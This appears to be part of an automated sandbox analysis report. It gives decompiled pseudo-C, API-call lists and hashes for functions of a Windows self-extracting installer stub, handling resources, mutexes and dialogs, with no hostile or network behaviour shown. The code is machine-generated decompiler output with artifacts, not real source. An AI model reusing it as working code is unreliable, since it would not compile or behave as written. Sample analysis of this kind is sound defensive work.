                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000003E8,00A48598,00000200), ref: 00A43271
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A433E2
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 00A433F7
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A43410
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000836), ref: 00A43426
                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000), ref: 00A4342D
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A4343F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$cent
                                                                                                                                                                                                                                            • API String ID: 2418873061-3711820486
                                                                                                                                                                                                                                            • Opcode ID: c119a9d424ff28732ec8bce52e90d97e474810f1da196f7a5474bd16e060abc6
                                                                                                                                                                                                                                            • Instruction ID: 460f59df13bc7e300bbae8fccd2cb17bd1f12956e4c2931eabe4a34789cd5948
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c119a9d424ff28732ec8bce52e90d97e474810f1da196f7a5474bd16e060abc6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C514A3E380240B7FF619FB95C4CFBB2958DBE7B56F104128F2069A1D1CBA59E029261
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A42CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				struct HRSRC__* _t31;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t13 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                            				_t65 = 0;
                                                                                                                                                                                                                                            				_t66 = __ecx;
                                                                                                                                                                                                                                            				_t48 = __edx;
                                                                                                                                                                                                                                            				 *0xa49a3c = __ecx;
                                                                                                                                                                                                                                            				memset(0xa49140, 0, 0x8fc);
                                                                                                                                                                                                                                            				memset(0xa48a20, 0, 0x32c);
                                                                                                                                                                                                                                            				memset(0xa488c0, 0, 0x104);
                                                                                                                                                                                                                                            				 *0xa493ec = 1;
                                                                                                                                                                                                                                            				_t20 = E00A4468F("TITLE", 0xa49154, 0x7f);
                                                                                                                                                                                                                                            				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                            					_t64 = 0x4b1;
                                                                                                                                                                                                                                            					goto L32;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                            					 *0xa4858c = _t27;
                                                                                                                                                                                                                                            					SetEvent(_t27);
                                                                                                                                                                                                                                            					_t64 = 0xa49a34;
                                                                                                                                                                                                                                            					if(E00A4468F("EXTRACTOPT", 0xa49a34, 4) != 0) {
                                                                                                                                                                                                                                            						if(( *0xa49a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                            							 *0xa49120 =  *0xa49120 & _t65;
                                                                                                                                                                                                                                            							if(E00A45C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                            								if( *0xa48a3a == 0) {
                                                                                                                                                                                                                                            									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                            									if(_t31 != 0) {
                                                                                                                                                                                                                                            										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0xa48184 != 0) {
                                                                                                                                                                                                                                            										__imp__#17();
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0xa48a24 == 0) {
                                                                                                                                                                                                                                            										_t57 = _t65;
                                                                                                                                                                                                                                            										if(E00A436EE(_t65) == 0) {
                                                                                                                                                                                                                                            											goto L33;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t33 =  *0xa49a40; // 0x3
                                                                                                                                                                                                                                            											_t48 = 1;
                                                                                                                                                                                                                                            											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                            												if(( *0xa49a34 & 0x00000100) == 0 || ( *0xa48a38 & 0x00000001) != 0 || E00A418A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t64 = 0x7d6;
                                                                                                                                                                                                                                            													if(E00A46517(_t57, 0x7d6, _t34, E00A419E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                            														goto L33;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												L30:
                                                                                                                                                                                                                                            												_t23 = _t48;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t23 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A42390(0xa48a3a);
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t64 = 0x520;
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								E00A444B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 =  &_v268;
                                                                                                                                                                                                                                            							if(E00A4468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            								goto L3;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                            								 *0xa48588 = _t43;
                                                                                                                                                                                                                                            								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(( *0xa49a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                            										_t64 = 0x524;
                                                                                                                                                                                                                                            										if(E00A444B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                            											goto L12;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L11;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t64 = 0x54b;
                                                                                                                                                                                                                                            										E00A444B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                                                            										L11:
                                                                                                                                                                                                                                            										CloseHandle( *0xa48588);
                                                                                                                                                                                                                                            										 *0xa49124 = 0x800700b7;
                                                                                                                                                                                                                                            										goto L33;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t64 = 0x4b1;
                                                                                                                                                                                                                                            						E00A444B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						 *0xa49124 = 0x80070714;
                                                                                                                                                                                                                                            						L33:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00a42cb5
                                                                                                                                                                                                                                            0x00a42cbc
                                                                                                                                                                                                                                            0x00a42cc7
                                                                                                                                                                                                                                            0x00a42cc9
                                                                                                                                                                                                                                            0x00a42cd1
                                                                                                                                                                                                                                            0x00a42cd3
                                                                                                                                                                                                                                            0x00a42cd9
                                                                                                                                                                                                                                            0x00a42ce9
                                                                                                                                                                                                                                            0x00a42cf9
                                                                                                                                                                                                                                            0x00a42d0e
                                                                                                                                                                                                                                            0x00a42d15
                                                                                                                                                                                                                                            0x00a42d1c
                                                                                                                                                                                                                                            0x00a42ef3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42d2d
                                                                                                                                                                                                                                            0x00a42d34
                                                                                                                                                                                                                                            0x00a42d3b
                                                                                                                                                                                                                                            0x00a42d40
                                                                                                                                                                                                                                            0x00a42d48
                                                                                                                                                                                                                                            0x00a42d59
                                                                                                                                                                                                                                            0x00a42d84
                                                                                                                                                                                                                                            0x00a42e1f
                                                                                                                                                                                                                                            0x00a42e1f
                                                                                                                                                                                                                                            0x00a42e2e
                                                                                                                                                                                                                                            0x00a42e41
                                                                                                                                                                                                                                            0x00a42e5a
                                                                                                                                                                                                                                            0x00a42e62
                                                                                                                                                                                                                                            0x00a42e6c
                                                                                                                                                                                                                                            0x00a42e6c
                                                                                                                                                                                                                                            0x00a42e75
                                                                                                                                                                                                                                            0x00a42e77
                                                                                                                                                                                                                                            0x00a42e77
                                                                                                                                                                                                                                            0x00a42e84
                                                                                                                                                                                                                                            0x00a42e8b
                                                                                                                                                                                                                                            0x00a42e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42e96
                                                                                                                                                                                                                                            0x00a42e96
                                                                                                                                                                                                                                            0x00a42e9e
                                                                                                                                                                                                                                            0x00a42ea2
                                                                                                                                                                                                                                            0x00a42eba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42ece
                                                                                                                                                                                                                                            0x00a42ede
                                                                                                                                                                                                                                            0x00a42eed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42eed
                                                                                                                                                                                                                                            0x00a42eef
                                                                                                                                                                                                                                            0x00a42eef
                                                                                                                                                                                                                                            0x00a42eef
                                                                                                                                                                                                                                            0x00a42eef
                                                                                                                                                                                                                                            0x00a42ea2
                                                                                                                                                                                                                                            0x00a42e86
                                                                                                                                                                                                                                            0x00a42e88
                                                                                                                                                                                                                                            0x00a42e88
                                                                                                                                                                                                                                            0x00a42e43
                                                                                                                                                                                                                                            0x00a42e48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42e48
                                                                                                                                                                                                                                            0x00a42e30
                                                                                                                                                                                                                                            0x00a42e30
                                                                                                                                                                                                                                            0x00a42ef8
                                                                                                                                                                                                                                            0x00a42f01
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42f01
                                                                                                                                                                                                                                            0x00a42d8a
                                                                                                                                                                                                                                            0x00a42d8f
                                                                                                                                                                                                                                            0x00a42da1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42da3
                                                                                                                                                                                                                                            0x00a42dae
                                                                                                                                                                                                                                            0x00a42db4
                                                                                                                                                                                                                                            0x00a42dbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42dca
                                                                                                                                                                                                                                            0x00a42dd3
                                                                                                                                                                                                                                            0x00a42df5
                                                                                                                                                                                                                                            0x00a42e02
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42dd5
                                                                                                                                                                                                                                            0x00a42dde
                                                                                                                                                                                                                                            0x00a42de3
                                                                                                                                                                                                                                            0x00a42e04
                                                                                                                                                                                                                                            0x00a42e0a
                                                                                                                                                                                                                                            0x00a42e10
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42e10
                                                                                                                                                                                                                                            0x00a42dd3
                                                                                                                                                                                                                                            0x00a42dbb
                                                                                                                                                                                                                                            0x00a42da1
                                                                                                                                                                                                                                            0x00a42d5b
                                                                                                                                                                                                                                            0x00a42d5b
                                                                                                                                                                                                                                            0x00a42d5d
                                                                                                                                                                                                                                            0x00a42d69
                                                                                                                                                                                                                                            0x00a42d6e
                                                                                                                                                                                                                                            0x00a42f06
                                                                                                                                                                                                                                            0x00a42f06
                                                                                                                                                                                                                                            0x00a42f06
                                                                                                                                                                                                                                            0x00a42d59
                                                                                                                                                                                                                                            0x00a42f18

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A42CD9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A42CE9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A42CF9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A42D34
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A42D40
                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A42DAE
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A42DBD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A42E0A
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                                                            • API String ID: 1002816675-2654900392
                                                                                                                                                                                                                                            • Opcode ID: edbd9976a6c9244c9434605c35d03faf363d2754bcac15ce0861812a58745605
                                                                                                                                                                                                                                            • Instruction ID: 0511f5e3013b04fc1ca590d142ace44fe4b04af75c7b8d4ecbc4e709ab52cedd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: edbd9976a6c9244c9434605c35d03faf363d2754bcac15ce0861812a58745605
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF51D47C740341ABE760EBA49D4BB7B2AA8EBD6740F804139F941D51D1DBF98C92C722
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                                                                                            			E00A434F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t35;
                                                                                                                                                                                                                                            				struct HWND__* _t38;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t9 == 0) {
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					 *0xa491d8 = 1;
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                                            					L21:
                                                                                                                                                                                                                                            					EndDialog();
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				_pop(1);
                                                                                                                                                                                                                                            				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                            				if(_t12 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                            					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t35 = _a4;
                                                                                                                                                                                                                                            					 *0xa48584 = _t35;
                                                                                                                                                                                                                                            					E00A443D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                            					__eflags =  *0xa48184; // 0x1
                                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                                                            					_t17 = CreateThread(0, 0, E00A44FE0, 0, 0, 0xa48798);
                                                                                                                                                                                                                                            					 *0xa4879c = _t17;
                                                                                                                                                                                                                                            					__eflags = _t17;
                                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						E00A444B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t35);
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t23 = _t13 - 1;
                                                                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 2;
                                                                                                                                                                                                                                            					if(_a12 != 2) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					ResetEvent( *0xa4858c);
                                                                                                                                                                                                                                            					_t38 =  *0xa48584; // 0x0
                                                                                                                                                                                                                                            					_t25 = E00A444B9(_t38, 0x4b2, 0xa41140, 0, 0x20, 4);
                                                                                                                                                                                                                                            					__eflags = _t25 - 6;
                                                                                                                                                                                                                                            					if(_t25 == 6) {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						 *0xa491d8 = 1;
                                                                                                                                                                                                                                            						SetEvent( *0xa4858c);
                                                                                                                                                                                                                                            						_t39 =  *0xa4879c; // 0x0
                                                                                                                                                                                                                                            						E00A43680(_t39);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t25 - 1;
                                                                                                                                                                                                                                            					if(_t25 == 1) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetEvent( *0xa4858c);
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                            					TerminateThread( *0xa4879c, 0);
                                                                                                                                                                                                                                            					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x00a434fb
                                                                                                                                                                                                                                            0x00a434fe
                                                                                                                                                                                                                                            0x00a43665
                                                                                                                                                                                                                                            0x00a43666
                                                                                                                                                                                                                                            0x00a43666
                                                                                                                                                                                                                                            0x00a43668
                                                                                                                                                                                                                                            0x00a4366e
                                                                                                                                                                                                                                            0x00a4366e
                                                                                                                                                                                                                                            0x00a43671
                                                                                                                                                                                                                                            0x00a43671
                                                                                                                                                                                                                                            0x00a43677
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43677
                                                                                                                                                                                                                                            0x00a43504
                                                                                                                                                                                                                                            0x00a43506
                                                                                                                                                                                                                                            0x00a43507
                                                                                                                                                                                                                                            0x00a4350c
                                                                                                                                                                                                                                            0x00a4365b
                                                                                                                                                                                                                                            0x00a4365f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43661
                                                                                                                                                                                                                                            0x00a43512
                                                                                                                                                                                                                                            0x00a43515
                                                                                                                                                                                                                                            0x00a435be
                                                                                                                                                                                                                                            0x00a435c1
                                                                                                                                                                                                                                            0x00a435d1
                                                                                                                                                                                                                                            0x00a435d8
                                                                                                                                                                                                                                            0x00a435de
                                                                                                                                                                                                                                            0x00a435f8
                                                                                                                                                                                                                                            0x00a43617
                                                                                                                                                                                                                                            0x00a43617
                                                                                                                                                                                                                                            0x00a43623
                                                                                                                                                                                                                                            0x00a43637
                                                                                                                                                                                                                                            0x00a4363d
                                                                                                                                                                                                                                            0x00a43642
                                                                                                                                                                                                                                            0x00a43644
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43646
                                                                                                                                                                                                                                            0x00a43652
                                                                                                                                                                                                                                            0x00a43657
                                                                                                                                                                                                                                            0x00a43658
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43658
                                                                                                                                                                                                                                            0x00a43644
                                                                                                                                                                                                                                            0x00a4351b
                                                                                                                                                                                                                                            0x00a4351d
                                                                                                                                                                                                                                            0x00a4354f
                                                                                                                                                                                                                                            0x00a43553
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4355f
                                                                                                                                                                                                                                            0x00a43565
                                                                                                                                                                                                                                            0x00a4357c
                                                                                                                                                                                                                                            0x00a43581
                                                                                                                                                                                                                                            0x00a43584
                                                                                                                                                                                                                                            0x00a4359b
                                                                                                                                                                                                                                            0x00a435a1
                                                                                                                                                                                                                                            0x00a435a7
                                                                                                                                                                                                                                            0x00a435ad
                                                                                                                                                                                                                                            0x00a435b3
                                                                                                                                                                                                                                            0x00a435b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a435b8
                                                                                                                                                                                                                                            0x00a43586
                                                                                                                                                                                                                                            0x00a43588
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43590
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43590
                                                                                                                                                                                                                                            0x00a43524
                                                                                                                                                                                                                                            0x00a43535
                                                                                                                                                                                                                                            0x00a43541
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43549
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 00A43535
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A43541
                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 00A4355F
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00A41140,00000000,00000020,00000004), ref: 00A43590
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A435C7
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00A435F1
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00A435F8
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00A43610
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00A43617
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 00A43623
                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 00A43637
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A43671
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                            • String ID: cent
                                                                                                                                                                                                                                            • API String ID: 2406144884-3940384054
                                                                                                                                                                                                                                            • Opcode ID: 1c5605e96eac45e000f28b202c3b8037a59d93b502a5aa089fe9ac531e547ef1
                                                                                                                                                                                                                                            • Instruction ID: 4f7e83a29a0321b9e7984433075f7660c1310d72501e7b711d04368c5a45a680
